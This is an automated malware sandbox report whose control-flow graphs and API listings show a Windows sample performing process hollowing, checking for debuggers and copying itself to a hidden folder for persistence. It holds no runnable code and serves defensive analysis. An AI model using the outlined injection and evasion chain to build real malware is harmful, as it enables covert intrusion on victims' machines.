Function_00007FF67352EFCA 108 Function_00007FF6735233CC 108->47 109 Function_00007FF67352C9CB 110 Function_00007FF67352A2D0

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 231 7ff673522048-7ff6735220c2 GetModuleFileNameW 232 7ff6735220c9-7ff673522105 231->232 233 7ff6735220c4 231->233 235 7ff673522107-7ff67352210f 232->235 236 7ff67352211d-7ff673522139 call 7ff673521f88 232->236 234 7ff67352296d-7ff673522975 233->234 237 7ff67352213b-7ff673522157 call 7ff673521fc8 235->237 238 7ff673522111-7ff673522119 235->238 246 7ff67352217c-7ff673522186 236->246 237->246 240 7ff673522159-7ff673522175 call 7ff673522008 238->240 241 7ff67352211b-7ff673522177 238->241 240->246 241->234 249 7ff673522188 246->249 250 7ff67352218d-7ff6735221e1 CreateProcessW 246->250 249->234 251 7ff6735221e8-7ff673522228 CreateFileW 250->251 252 7ff6735221e3 250->252 253 7ff67352222a 251->253 254 7ff67352222f-7ff67352224b GetFileSize 251->254 252->234 253->234 255 7ff673522257-7ff673522262 CloseHandle 254->255 256 7ff67352224d-7ff673522255 254->256 255->234 256->255 257 7ff673522267-7ff67352228f VirtualAlloc 256->257 258 7ff6735222a1-7ff6735222cc ReadFile 257->258 259 7ff673522291-7ff67352229c CloseHandle 257->259 260 7ff6735222ce-7ff6735222ec VirtualFree CloseHandle 258->260 261 7ff6735222f1-7ff67352233f CloseHandle GetThreadContext 258->261 259->234 260->234 262 7ff673522359-7ff6735223de ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 261->262 263 7ff673522341-7ff673522354 VirtualFree 261->263 264 7ff6735223f8-7ff673522461 VirtualAllocEx 262->264 265 7ff6735223e0-7ff6735223f3 VirtualFree 262->265 263->234 266 7ff67352247b-7ff6735224af WriteProcessMemory 264->266 267 7ff673522463-7ff673522476 VirtualFree 264->267 265->234 268 7ff6735224c9-7ff6735224d4 266->268 269 7ff6735224b1-7ff6735224c4 VirtualFree 266->269 267->234 270 7ff6735224e6-7ff6735224f9 268->270 269->234 271 7ff6735225a7-7ff6735225ee 270->271 272 7ff6735224ff-7ff673522588 WriteProcessMemory 270->272 275 7ff673522600-7ff673522613 271->275 273 7ff67352258a-7ff67352259d VirtualFree 272->273 274 7ff6735225a2 272->274 273->234 274->270 276 7ff673522619-7ff673522668 RtlCompareMemory 275->276 277 7ff673522898-7ff67352291c WriteProcessMemory SetThreadContext 275->277 279 7ff67352266a 276->279 280 7ff67352266c-7ff673522695 276->280 281 7ff67352291e-7ff673522931 VirtualFree 277->281 282 7ff673522933-7ff673522943 ResumeThread 277->282 279->275 284 7ff6735226a0-7ff6735226ae 280->284 281->234 285 7ff67352295a-7ff673522967 VirtualFree 282->285 286 7ff673522945-7ff673522958 VirtualFree 282->286 287 7ff673522893 284->287 288 7ff6735226b4-7ff67352273f 284->288 285->234 286->234 287->277 289 7ff673522751-7ff67352275f 288->289 290 7ff67352288e 289->290 291 7ff673522765-7ff673522798 289->291 290->284 292 7ff67352279a 291->292 293 7ff67352279c-7ff67352286f ReadProcessMemory WriteProcessMemory 291->293 292->289 295 7ff673522889 293->295 296 7ff673522871-7ff673522884 VirtualFree 293->296 295->290 296->234
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                                                  • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                  • Instruction ID: cfd355b6b62128b79ebff66e2661d11923ef08465917f50ec09716ad5018f487
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7632E67662CBC586E7B4CB16E9557AAB3A1FBC8B84F004136DA8D93B59DF3CD4448B00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 297 7ff67352345c-7ff673523472 call 7ff6735210a0 call 7ff67352321c 302 7ff67352347c-7ff6735234aa call 7ff673524264 call 7ff673523ce4 call 7ff673523f14 297->302 303 7ff673523474-7ff673523476 ExitProcess 297->303 310 7ff6735234fb-7ff67352350e call 7ff673523f14 302->310 311 7ff6735234ac-7ff6735234bd call 7ff6735243a4 302->311 316 7ff67352354c-7ff67352355f call 7ff673523f14 310->316 317 7ff673523510-7ff673523521 call 7ff6735243a4 310->317 318 7ff6735234bf-7ff6735234d0 call 7ff6735243a4 311->318 319 7ff6735234d2-7ff6735234d4 ExitProcess 311->319 329 7ff673523561-7ff673523572 call 7ff6735243a4 316->329 330 7ff6735235a2-7ff6735235b8 call 7ff673523a74 call 7ff6735233ec 316->330 326 7ff67352352b call 7ff67352327c 317->326 327 7ff673523523-7ff673523525 ExitProcess 317->327 318->319 328 7ff6735234da call 7ff6735232ec 318->328 335 7ff673523530-7ff673523535 326->335 337 7ff6735234df-7ff6735234e4 328->337 344 7ff67352357c call 7ff67352327c 329->344 345 7ff673523574-7ff673523576 ExitProcess 329->345 349 7ff6735235ba-7ff6735235cb call 7ff6735243a4 330->349 350 7ff67352360e-7ff6735236d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 330->350 339 7ff673523537-7ff673523542 Sleep 335->339 340 7ff673523544-7ff673523546 ExitProcess 335->340 342 7ff6735234e6-7ff6735234f1 Sleep 337->342 343 7ff6735234f3-7ff6735234f5 ExitProcess 337->343 339->335 342->337 348 7ff673523581-7ff673523586 344->348 351 7ff673523588-7ff673523593 Sleep 348->351 352 7ff673523595-7ff673523597 ExitProcess 348->352 355 7ff6735235cd-7ff6735235de call 7ff6735243a4 349->355 356 7ff6735235e0-7ff6735235e2 ExitProcess 349->356 351->348 355->356 359 7ff6735235e8 call 7ff6735232ec 355->359 361 7ff6735235ed-7ff6735235f2 359->361 362 7ff673523601-7ff673523603 ExitProcess 361->362 363 7ff6735235f4-7ff6735235ff Sleep 361->363 363->361
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                                                  • Opcode ID: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                                                  • Instruction ID: b945f52043b322a6283d9877bfe7d44b829d7d049a47d0ec39f9accc3b0054ae
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29612BA3A3CA9381FB64EB31EA5767A23A0BF94700F500135D44EE61E2CF3EE509C650

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                                                  • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                  • Instruction ID: d76f34ae36d97aea9f5ecb4fa772d3c273ebe1753a5f9dd74901e5696a05286b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 573134B3A2CA8186E750CB15E552B2EB7A0FBD4B80F501135FA8E93B68DF3DD4418B00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF673523744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF673523784
                                                                                                                                                                                                    • Part of subcall function 00007FF673523744: GetVolumeInformationW.KERNELBASE ref: 00007FF673523801
                                                                                                                                                                                                    • Part of subcall function 00007FF673523744: wsprintfW.USER32 ref: 00007FF6735238A2
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF67352390D
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523922
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523935
                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523945
                                                                                                                                                                                                  • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523958
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF67352396D
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523980
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523995
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                  • Opcode ID: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                  • Instruction ID: 75e3ef2c92240a273f4260006f449dda1864f391cb6cc2a9f2b436ae5bea0887
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D1130A27389C686FB60DF25F95676A6361FBD4B80F405031DA8E93A29DE3CD408CB00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF673523744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF673523784
                                                                                                                                                                                                    • Part of subcall function 00007FF673523744: GetVolumeInformationW.KERNELBASE ref: 00007FF673523801
                                                                                                                                                                                                    • Part of subcall function 00007FF673523744: wsprintfW.USER32 ref: 00007FF6735238A2
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF67352390D
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523922
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523935
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523945
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523958
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF67352396D
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523980
                                                                                                                                                                                                    • Part of subcall function 00007FF6735238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF673523AA9), ref: 00007FF673523995
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00007FF673523AB9
                                                                                                                                                                                                  • DeleteFileW.KERNELBASE ref: 00007FF673523AC4
                                                                                                                                                                                                  • CopyFileW.KERNELBASE ref: 00007FF673523ADD
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 00007FF673523AF5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: Services
                                                                                                                                                                                                  • API String ID: 3209240227-2319745855
                                                                                                                                                                                                  • Opcode ID: cabd95d3c80652fe8b367c9eb5d64b267906483226546c4ea9003bdd6899bef0
                                                                                                                                                                                                  • Instruction ID: 03f8421d699cd9df4c5b2f20d263f2bb8c8c4d7741793bd39dc0b98e58216696
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cabd95d3c80652fe8b367c9eb5d64b267906483226546c4ea9003bdd6899bef0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF0192A3B2898292FF60DB24E5563AA53A0FB94744F804432D74DD35A9EF2DD20ECB00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                                                  • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                  • Instruction ID: 8d53afc3a8e89a31aeed19712748aca004de9703b22280dd04f05096f9ff35db
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7131076762C6C186EB30DB64E5993AAB3A0FB84700F401136E68DD7A58EF7EC508CF00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                                                  • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                  • Instruction ID: 58c01f4231b4ff19d760c011a6bb81399a06a02490fa571af09f6243a7366014
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1F0A7A391C282C1F730CB65B60637927E0BF55B08F001174D98DA6595CF3DE509DF11

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 416 7ff673521050-7ff67352108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                                                  • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                  • Instruction ID: 3cef7c48a46292b0bc20e5c873db6a907cfbb5bce4c21a76f6c783e9bb82e175
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EE09276519F8086D620DB15F84101AB7B4FBC8794F504125EBCD82B28DF3CC169CB04

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 420 7ff673523b54-7ff673523b7a VirtualAlloc
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                  • Opcode ID: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                                                  • Instruction ID: a639383e44d1b5bb1d173d196fb059ab8c9f5e159f01b70efb9482186c269864
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EC012B1F2518083D71CDF21E451A0A2A10A744740F504028D60157744CD3DC1514F04

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 417 7ff673523b24-7ff673523b33 418 7ff673523b48-7ff673523b4c 417->418 419 7ff673523b35-7ff673523b42 VirtualFree 417->419 419->418
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff673520000_A629855EB2A22925382193.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                  • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                  • Instruction ID: c29d5136f882e2a091c5055ae212d93c6b2e11d1bc9957568acbbb02becf1ab5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51D01262E3898181FB94DB26E98A729A3A0FFC4B44F808035E68991564CF3DC0998F00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000006.00000002.1439767258.00007FF673521000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF673520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439687192.00007FF673520000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439842699.00007FF673525000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439893953.00007FF673527000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1439981752.00007FF673528000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000006.00000002.1440047172.00007FF67352A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
